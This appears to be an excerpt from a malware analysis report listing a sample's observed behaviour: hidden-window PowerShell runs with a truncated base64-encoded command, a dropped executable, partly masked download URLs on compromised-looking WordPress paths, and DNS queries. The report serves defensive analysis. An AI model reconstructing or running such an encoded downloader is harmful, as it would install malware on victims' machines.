Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASwBqAGUAdABmAGoAdwB6AGoAaQBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFoAaABrAGoAagBhAHoAbwBmAGoAcQAgACMAPgAgACQAQQBuAHEAbwBoAGIAbwBkAGgAPQAnAEwAZg...
- %HOMEPATH%\332.exe
- http://ep###etwork.cf/wp-includes/87548/
- http://ne#.#adar.kz/wp-includes/j154/
- DNS ASK ar###ore.com.vn
- DNS ASK ep###etwork.cf
- DNS ASK sr######kshmiborewell.in
- DNS ASK pe###trade.hu
- DNS ASK ne#.#adar.kz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASwBqAGUAdABmAGoAdwB6AGoAaQBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFoAaABrAGoAagBhAHoAbwBmAGoAcQAgACMAPgAgACQAQQBuAHEAbwBoAGIAbwBkAGgAPQAnAEwAZg...' (with hidden window)